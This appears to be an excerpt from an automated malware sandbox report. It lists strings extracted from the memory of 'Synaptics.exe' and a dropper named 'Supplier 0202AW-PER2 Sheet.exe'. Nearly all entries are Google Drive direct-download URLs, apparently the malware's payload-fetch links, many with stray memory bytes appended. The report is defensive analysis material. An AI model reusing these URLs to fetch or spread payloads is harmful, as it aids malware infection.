                                Source: Synaptics.exe, 00000003.00000002.1705901782.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1709014926.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1713766865.00000000156BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1718925846.0000000017FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1679716664.0000000004C5E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMX
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: RCXC902.tmp.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1695531034.000000000C5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1693561293.000000000AF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1708264876.00000000124BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1705354224.000000000F97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685337965.0000000007CBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1681559570.000000000576E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1711220948.00000000142BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1695040691.000000000C0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1690584388.000000000917E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1706060560.00000000104BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1682493472.0000000005EEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1715090073.00000000161FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1708068527.000000001223E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1710855117.000000001403E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1706300561.000000001087E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1716689290.00000000170FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1692651019.000000000A7FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1710107592.00000000138BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#B
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#NP
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%PV
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(J
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(SI
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)o
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.&x
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.PK
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cD
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cT
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.comr&
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.dev
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.org0&N
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/TL
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000679000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0P
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1T
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1n
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download25122
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2S_
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4w
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5N&
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5v
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download64=
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6M#
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6_
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7B-
                                Source: Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9$H
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9Z
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:TW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;repo
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;u
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=O
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(I
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?R
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAOr
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBNo
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBulunamad
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC(
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCRp
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadContt
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDPu
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadETv
